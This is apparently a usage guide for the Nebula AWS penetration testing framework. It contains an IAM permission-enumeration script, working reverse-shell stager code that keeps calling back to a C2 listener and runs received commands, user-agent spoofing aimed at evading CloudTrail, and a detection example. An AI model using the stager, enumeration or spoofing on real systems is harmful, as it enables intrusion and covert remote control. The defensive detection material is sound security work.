Project overview
Nebula is a cloud and DevOps penetration testing framework organised as one module per provider and per capability. As of April 2021 it covers only AWS, but it is an active project expected to grow towards GCP, Azure, Kubernetes, Docker and automation engines such as Ansible, Terraform and Chef.
Feature coverage
- Custom HTTP User-Agent
- S3 bucket name brute force
- IAM, EC2 and S3 exploitation
- IAM, EC2, S3 and Lambda enumeration
Setup
Step 1: Fetch the project
git clone https://github.com/gl4ssesbo1/Nebula
docker pull gl4ssesbo1/nebula:latest
Step 2: Run it
cd Nebula
docker run -v $(pwd):/app -ti gl4ssesbo1/nebula:latest main.py
The -v $(pwd):/app bind mount keeps the checkout, and the ./workspaces output the modules write (see the saved-output paths below), on the host rather than inside the container.
Usage
Help
()()(AWS) >>> help
Help Command:            Description:
-------------            ------------
help                     Show help for all the commands
help credentials         Show help for credentials
help module              Show help for modules
help workspace           Show help for workspaces
help user-agent          Show help for user agents
help shell               Show help for shell connections

Module Commands          Description
---------------          -----------
show modules             List all the modules
show enum                List all Enumeration modules
show exploit             List all Exploit modules
show persistence         List all Persistence modules
show privesc             List all Privilege Escalation modules
show reconnaissance      List all Reconnaissance modules
show listener            List all Listener modules
show cleanup             List all Cleanup modules
show detection           List all Detection modules
show detectionbypass     List all Detection Bypass modules
show lateralmovement     List all Lateral Movement modules
show stager              List all Stager modules
use module <module>      Use a module.
options                  Show options of a module you have selected.
run                      Run a module you have selected. Eg: 'run <module name>'
search                   Search for a module via pattern. Eg: 'search s3'
back                     Unselect a module
set <option>             Set option of a module. Need to have the module used first.
unset <option>           Unset option of a module. Need to have the module used first.

User-Agent commands      Description
-------------------      -----------
set user-agent windows   Set a Windows client user agent
set user-agent linux     Set a Linux client user agent
set user-agent custom    Set a custom client user agent
show user-agent          Show the current user agent
unset user-agent         Use the user agent that boto3 produces

Workspace Commands       Description
------------------       -----------
create workspace <wp>    Create a workspace
use workspace <wp>       Use one of the workspaces
remove workspace <wp>    Remove a workspace

Shell commands           Description
--------------           -----------
shell check_env          Check the environment you are in, get data and meta-data
shell exit               Kill a connection
shell <command>          Run a command on a system. No quotes are needed around the command, just shell <command1> <command2>
Checking your privileges
(test)()(AWS) >>> getuid
------------------------------------------------
UserId: A******************Q
------------------------------------------------
UserID: A******************Q
Arn: arn:aws:iam::012345678912:user/user_user
Account: 012345678912
[*] Output is saved to './workspaces/test/12_07_2021_02_22_54_getuid_dev_brian'
(test)()(AWS) >>> enum_user_privs
User: user_user
UserID: A******************Q
Arn: arn:aws:iam::012345678912:user/user_user
Account: 012345678912
--------------------------
Service: ec2
--------------------------
[*] Trying the 'Describe' functions:
[*] 'describe_account_attributes' worked!
[*] 'describe_addresses' worked!
[*] 'describe_aggregate_id_format' worked!
[*] 'describe_availability_zones' worked!
[*] 'describe_bundle_tasks' worked!
[*] 'describe_capacity_reservations' worked!
[*] 'describe_client_vpn_endpoints' worked!
[*] 'describe_coip_pools' worked!
[*] 'describe_customer_gateways' worked!
[*] 'describe_dhcp_options' worked!
[*] 'describe_egress_only_internet_gateways' worked!
^C[*] Stopping. It might take a while. Please wait.
[*] Output of the allowed functions is saved to './workspaces/test/12_07_2021_02_24_09_enum_user_privs'
[*] The list of the allowed functions is saved to './workspaces/test/12_07_2021_02_24_09_allowed_functions'
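enum_user_privs works by simply trying each read-only API call and noting which ones the credentials are allowed to make. The following is an added example of that technique, written for this page and not taken from Nebula: it calls every parameterless describe_/list_/get_ method on a boto3-style client and buckets the outcome as allowed, denied, or inconclusive. FakeEC2Client and FakeClientError are constructed stand-ins so the example runs offline; pointing probe_read_calls at a real boto3.client("ec2") is an assumption about how you would use it, and every probe, allowed or denied, is recorded in CloudTrail.

```python
"""Added example: probe which read-only API calls a set of AWS credentials may make.

Illustrative code in the spirit of Nebula's enum_user_privs, not code from the
Nebula project. It calls every parameterless describe_*/list_*/get_* method on a
boto3-style client and sorts them by outcome. FakeEC2Client is a constructed
stand-in so the example runs offline.
"""
from __future__ import annotations

from typing import Any

# Error codes AWS returns when the caller lacks permission (EC2 uses UnauthorizedOperation).
DENIED_CODES = {"AccessDenied", "AccessDeniedException", "UnauthorizedOperation"}
READ_PREFIXES = ("describe_", "list_", "get_")
# boto3 client helpers that match the prefixes but are not API operations.
SKIP = {"get_paginator", "get_waiter"}


def error_code(exc: BaseException) -> str | None:
    """Pull the AWS error code out of a botocore ClientError-shaped exception (duck typed)."""
    response = getattr(exc, "response", None)
    if isinstance(response, dict):
        return response.get("Error", {}).get("Code")
    return None


def probe_read_calls(client: Any, prefixes: tuple[str, ...] = READ_PREFIXES) -> dict[str, list[str]]:
    """Invoke each parameterless read-only operation and bucket it as allowed/denied/other.

    'other' collects calls that failed for reasons other than authorization
    (missing required parameters, throttling, no credentials, ...); those are
    not evidence either way and are worth re-trying with parameters by hand.
    """
    results: dict[str, list[str]] = {"allowed": [], "denied": [], "other": []}
    for name in sorted(dir(client)):
        if name in SKIP or not name.startswith(prefixes):
            continue
        method = getattr(client, name)
        if not callable(method):
            continue
        try:
            method()
        except Exception as exc:  # noqa: BLE001 - every failure is classified below
            bucket = "denied" if error_code(exc) in DENIED_CODES else "other"
            results[bucket].append(name)
        else:
            results["allowed"].append(name)
    return results


class FakeClientError(Exception):
    """Mimics botocore.exceptions.ClientError: the code lives in .response['Error']['Code']."""

    def __init__(self, code: str, operation: str) -> None:
        super().__init__(f"An error occurred ({code}) when calling the {operation} operation")
        self.response = {"Error": {"Code": code, "Message": "not authorized"}}


class FakeEC2Client:
    """Constructed stand-in for boto3.client('ec2') behind a partially permissive policy."""

    def describe_instances(self) -> dict:
        return {"Reservations": []}

    def describe_images(self) -> dict:
        return {"Images": []}

    def describe_volumes(self) -> dict:
        raise FakeClientError("UnauthorizedOperation", "DescribeVolumes")

    def describe_instance_attribute(self, InstanceId: str | None = None, Attribute: str | None = None) -> dict:
        # Real boto3 raises ParamValidationError (no .response) when required parameters are missing.
        if InstanceId is None or Attribute is None:
            raise ValueError("Missing required parameter in input: InstanceId, Attribute")
        return {}

    def get_paginator(self, operation_name: str) -> None:
        raise AssertionError("helper, must be skipped by probe_read_calls")


if __name__ == "__main__":
    try:
        import boto3  # optional: a real client needs credentials and network access
        client = boto3.client("ec2", region_name="us-east-1")
    except Exception:  # noqa: BLE001 - fall back to the offline stand-in
        client = FakeEC2Client()
    for outcome, names in probe_read_calls(client).items():
        print(f"{outcome}: {', '.join(names) or '-'}")
```

Against the fake client the result is allowed: describe_images, describe_instances; denied: describe_volumes; other: describe_instance_attribute. The same split is what the saved allowed_functions file in the transcript above records for a real account.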
Listing modules
()()(AWS) >>> show modules
cleanup/aws_iam_delete_access_key        Delete access key of a user by providing it.
cleanup/aws_iam_delete_login_profile     Delete access of a user to the Management Console.
enum/aws_ec2_enum_elastic_ips            Lists User data of an Instance provided. Requires Secret Key
                                         and Access Key of an IAM that has access to it.
enum/aws_ec2_enum_images                 List all ec2 images. Needs credentials of an IAM with
                                         DescribeImages right. Output is dumped to a file. It takes a
                                         sh*tload of time, unfortunately. And boy, is it a huge output.
enum/aws_ec2_enum_instances              Describes instance attributes: Instances, VPC, Zones, Images,
                                         Security Groups, Snapshots, Subnets, Tags, Volumes. Requires
                                         Secret Key and Access Key of an IAM that has access to all or
                                         any of the API calls: DescribeAvailabilityZones, DescribeImages,
                                         DescribeInstances, DescribeKeyPairs, DescribeSecurityGroups,
                                         DescribeSnapshots, DescribeSubnets, DescribeTags,
                                         DescribeVolumes, DescribeVpcs
Listing by module type:
show modules
show enum
show exploit
show persistence
show privesc
show reconnaissance
show listener
show cleanup
show detection
show detectionbypass
show lateralmovement
show stager
Searching modules
()()(AWS) >>> search instance
enum/aws_ec2_enum_instances                      Describes instance attributes: Instances, VPC, Zones, Images,
                                                 Security Groups, Snapshots, Subnets, Tags, Volumes. Requires
                                                 Secret Key and Access Key of an IAM that has access to all or
                                                 any of the API calls: DescribeAvailabilityZones, DescribeImages,
                                                 DescribeInstances, DescribeKeyPairs, DescribeSecurityGroups,
                                                 DescribeSnapshots, DescribeSubnets, DescribeTags,
                                                 DescribeVolumes, DescribeVpcs
enum/aws_iam_list_instance_profiles              List all the instance profiles.
exploit/aws_ec2_create_instance_with_user_data   You must provide policies in JSON format in IAM. However, for
                                                 AWS CloudFormation templates formatted in YAML, you can provide
                                                 the policy in JSON or YAML format. AWS CloudFormation always
                                                 converts a YAML policy to JSON format before submitting it to IAM.
()()(AWS) >>>
Selecting a module
The prompt changes to the selected module; the options output that follows is for enum/aws_ec2_enum_instances.
(work1)()(AWS) >>> use module enum/aws_ec2_enum_instances
(work1)()(enum/aws_ec2_enum_instances) >>>
Module details
(work1)()(enum/aws_ec2_enum_instances) >>> options
Description:
-----------------------------
Describes instance attributes: Instances, VPC, Zones, Images, Security Groups, Snapshots, Subnets, Tags, Volumes. Requires Secret Key and Access Key of an IAM that has access to all or any of the API calls: DescribeAvailabilityZones, DescribeImages, DescribeInstances, DescribeKeyPairs, DescribeSecurityGroups, DescribeSnapshots, DescribeSubnets, DescribeTags, DescribeVolumes, DescribeVpcs
Author:
-----------------------------
name: gl4ssesbo1
twitter: https://twitter.com/gl4ssesbo1
github: https://github.com/gl4ssesbo1
blog: https://www.pepperclipp.com/
AWSCLI Command:
-----------------------------
aws ec2 describe-instances --region {} --profile {}
Needs Credentials: True
-----------------------------
Options:
-----------------------------
SERVICE: ec2
Required: true
Description: The service that will be used to run the module. It cannot be changed.
INSTANCE-ID:
Required: false
Description: The ID of the instance you want to enumerate. If not supplied, all instances will be enumerated.
(work1)()(enum/aws_ec2_enum_instances) >>>
Reverse shell
A. Stager
()()(AWS) >>> use module stager/aws_python_tcp
()()(stager/aws_python_tcp) >>> options
Description:
-----------------------------
The TCP Reverse Shell that is used by listeners/aws_python_tcp_listener
Author:
-----------------------------
name: gl4ssesbo1
twitter: https://twitter.com/gl4ssesbo1
github: https://github.com/gl4ssesbo1
blog: https://www.pepperclipp.com/
Needs Credentials: False
-----------------------------
AWSCLI Command:
-----------------------------
None
Options:
-----------------------------
SERVICE: none
Required: true
Description: The service that will be used to run the module. It cannot be changed.
HOST:
Required: true
Description: The Host/IP of the C2 Server.
PORT:
Required: true
Description: The C2 Server Port.
FORMAT:
Required: true
Description: The format of the stager. Currently only allows 'py' for Python and 'elf' for ELF Binary.
CALLBACK-TIME: None
Required: true
Description: The time in seconds between callbacks from the Stager. The Stager keeps calling back in a loop even if the server crashes or is stopped.
OUTPUT-FILE-NAME:
Required: true
Description: The name of the stager output file.
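The CALLBACK-TIME option describes a stager that never gives up: it sleeps the configured interval and tries the listener again whenever the connection is refused or drops. The block below is an added example of that loop written for this page, not Nebula's stager code. The transport is pluggable so the retry logic can be exercised offline with a fake connection; tcp_connect() is the real-socket variant, and the listener address in the __main__ block is an assumed placeholder. Commands are executed without a shell and framed one per line, which is a design choice of this example, not a description of Nebula's wire format.

```python
"""Added example: the callback loop behind a stager's CALLBACK-TIME option.

Illustrative code, not Nebula's stager: keep trying to reach the listener every
`interval` seconds, serve one command session when connected, and go back to
retrying when the listener dies. The transport is pluggable so the loop can be
tested offline; tcp_connect() is the real-socket variant.
"""
from __future__ import annotations

import shlex
import socket
import subprocess
import time
from typing import Callable, Optional, Tuple

# A session is (recv_line, send, close); recv_line returns None at EOF.
Session = Tuple[Callable[[], Optional[str]], Callable[[str], None], Callable[[], None]]


def run_command(line: str) -> str:
    """Execute one command line without a shell and return stdout+stderr."""
    argv = shlex.split(line)
    if not argv:
        return ""
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
        return f"error: {exc}\n"
    return proc.stdout + proc.stderr


def serve_session(recv_line: Callable[[], Optional[str]], send: Callable[[str], None]) -> int:
    """Answer newline-framed commands until 'exit' or EOF; returns how many were handled."""
    handled = 0
    while True:
        line = recv_line()
        if line is None or line.strip() == "exit":
            return handled
        send(run_command(line))
        handled += 1


def tcp_connect(host: str, port: int) -> Session:
    """Real transport: one TCP connection to the listener (assumed HOST/PORT of the listener module)."""
    sock = socket.create_connection((host, port), timeout=10)
    reader = sock.makefile("r", encoding="utf-8", newline="\n")

    def recv_line() -> Optional[str]:
        line = reader.readline()
        return line.rstrip("\n") if line else None

    def send(text: str) -> None:
        sock.sendall(text.encode("utf-8"))

    def close() -> None:
        reader.close()
        sock.close()

    return recv_line, send, close


def callback_loop(connect: Callable[[], Session], interval: float,
                  max_attempts: Optional[int] = None,
                  sleep: Callable[[float], None] = time.sleep) -> Tuple[int, int]:
    """Keep calling back: sleep `interval` after every attempt, connected or not.

    Returns (attempts, completed_sessions). max_attempts=None loops forever,
    which is the behaviour the CALLBACK-TIME option describes.
    """
    attempts = sessions = 0
    while max_attempts is None or attempts < max_attempts:
        attempts += 1
        try:
            recv_line, send, close = connect()
        except OSError:            # listener down (refused, unreachable): wait and retry
            sleep(interval)
            continue
        try:
            serve_session(recv_line, send)
            sessions += 1
        except OSError:            # listener died mid-session: fall through to the retry loop
            pass
        finally:
            close()
        sleep(interval)
    return attempts, sessions


if __name__ == "__main__":
    # Assumed listener address; substitute the HOST/PORT you configured on the listener module.
    callback_loop(lambda: tcp_connect("127.0.0.1", 4444), interval=5.0)
```

With a connect function that fails twice and then yields a session, callback_loop reports three attempts and one completed session; in production the listener's HOST/PORT pair must be reachable from wherever the stager runs, which for an EC2 target usually means an outbound security-group rule and no egress proxy in the way.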
B. Listener
()()(stager/aws_python_tcp) >>> use module listeners/aws_python_tcp_listener
()()(listeners/aws_python_tcp_listener) >>> options
Description:
-----------------------------
TCP Listener for Reverse Shell stagers/aws_python_tcp
Author:
-----------------------------
name: gl4ssesbo1
twitter: https://twitter.com/gl4ssesbo1
github: https://github.com/gl4ssesbo1
blog: https://www.pepperclipp.com/
Needs Credentials: False
-----------------------------
AWSCLI Command:
-----------------------------
None
Options:
-----------------------------
SERVICE: none
Required: true
Description: The service that will be used to run the module. It cannot be changed.
HOST: 0.0.0.0
Required: true
Description: The Host/IP of the C2 Server.
PORT:
Required: true
Description: The C2 Server Port.
C. User-Agent
()()(AWS) >>> set user-agent linux
User Agent: Boto3/1.9.89 Python/3.8.1 Linux/4.1.2-34-generic was set
()()(AWS) >>> show user-agent
[*] User Agent is: Boto3/1.9.89 Python/3.8.1 Linux/4.1.2-34-generic
()()(AWS) >>> set user-agent windows
User Agent: Boto3/1.7.48 Python/3.9.1 Windows/7 Botocore/1.10.48 was set
()()(AWS) >>> show user-agent
[*] User Agent is: Boto3/1.7.48 Python/3.9.1 Windows/7 Botocore/1.10.48
()()(AWS) >>> set user-agent custom
Enter the User-Agent you want: sth
User Agent: sth was set
()()(AWS) >>> show user-agent
[*] User Agent is: sth
()()(AWS) >>>
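The point of the user-agent options is to make Nebula's API calls look like an ordinary boto3 client in CloudTrail. Two caveats: the canned strings pin specific old Boto3/Botocore versions and a fixed kernel string, which can themselves stand out in a fleet that runs one known SDK version, and the field is attacker-controlled either way. A defender should therefore key on behaviour such as the burst of access-denied calls that enum_user_privs produces. The following is an added detection example written for this page (not part of Nebula) over constructed, CloudTrail-shaped sample records; the user agent is only echoed in the finding, never used as a signal.

```python
"""Added example: spotting permission enumeration in CloudTrail regardless of User-Agent.

Illustrative detection logic, not part of Nebula. A module such as enum_user_privs
produces a burst of access-denied errors from one principal in a short window; a
spoofed User-Agent changes only the userAgent field. SAMPLE_RECORDS are constructed
events shaped like CloudTrail's, not real logs.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timezone

# Error codes CloudTrail records for denied calls (EC2 reports Client.UnauthorizedOperation).
DENIED_CODES = {"AccessDenied", "AccessDeniedException", "Client.UnauthorizedOperation"}


def parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_enumeration_bursts(records, threshold: int = 5, window_seconds: int = 300) -> list[dict]:
    """Flag principals with >= threshold denied API calls inside any window_seconds span."""
    denied = defaultdict(list)
    for rec in records:
        if rec.get("errorCode") in DENIED_CODES:
            denied[rec.get("userIdentity", {}).get("arn", "unknown")].append(rec)

    findings = []
    for arn, events in denied.items():
        events.sort(key=lambda r: parse_time(r["eventTime"]))
        times = [parse_time(r["eventTime"]) for r in events]
        peak, start = 0, 0
        for end in range(len(events)):            # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            findings.append({
                "arn": arn,
                "denied_in_window": peak,
                "event_names": sorted({r["eventName"] for r in events}),
                "user_agents": sorted({r.get("userAgent", "") for r in events}),
                "source_ips": sorted({r.get("sourceIPAddress", "") for r in events}),
            })
    return findings


def _event(ts: str, name: str, arn: str, code: str | None = None,
           ua: str = "aws-cli/2.2.0 Python/3.8.8 Linux/5.4.0") -> dict:
    rec = {"eventTime": ts, "eventSource": "ec2.amazonaws.com", "eventName": name,
           "userIdentity": {"type": "IAMUser", "arn": arn},
           "sourceIPAddress": "203.0.113.10", "userAgent": ua}
    if code:
        rec["errorCode"] = code
    return rec


ATTACKER = "arn:aws:iam::012345678912:user/user_user"   # the user from the getuid output above
ADMIN = "arn:aws:iam::012345678912:user/admin"         # assumed benign principal
SPOOFED_UA = "Boto3/1.9.89 Python/3.8.1 Linux/4.1.2-34-generic"   # the string 'set user-agent linux' installs

# Constructed sample: six denied Describe* calls in about two minutes, interleaved with normal activity.
SAMPLE_RECORDS = [
    _event("2021-07-12T02:24:10Z", "DescribeAccountAttributes", ATTACKER, ua=SPOOFED_UA),
    _event("2021-07-12T02:24:11Z", "DescribeVolumes", ATTACKER, "Client.UnauthorizedOperation", SPOOFED_UA),
    _event("2021-07-12T02:24:12Z", "DescribeSnapshots", ATTACKER, "Client.UnauthorizedOperation", SPOOFED_UA),
    _event("2021-07-12T02:24:40Z", "DescribeInstances", ADMIN),
    _event("2021-07-12T02:25:01Z", "DescribeVpcs", ATTACKER, "Client.UnauthorizedOperation", SPOOFED_UA),
    _event("2021-07-12T02:25:02Z", "DescribeSubnets", ATTACKER, "Client.UnauthorizedOperation", SPOOFED_UA),
    _event("2021-07-12T02:25:30Z", "DescribeKeyPairs", ATTACKER, "Client.UnauthorizedOperation", SPOOFED_UA),
    _event("2021-07-12T02:26:05Z", "DescribeSecurityGroups", ATTACKER, "Client.UnauthorizedOperation", SPOOFED_UA),
    _event("2021-07-12T02:59:00Z", "DescribeImages", ADMIN, "Client.UnauthorizedOperation"),
]

if __name__ == "__main__":
    for finding in find_enumeration_bursts(SAMPLE_RECORDS):
        print(finding)
```

On the sample data only user_user is flagged (six denials within five minutes); the admin's single denial stays below the threshold. Tune threshold and window_seconds to your account's baseline, and treat a finding that pairs many distinct eventNames with a single source IP as the strongest enumeration signal.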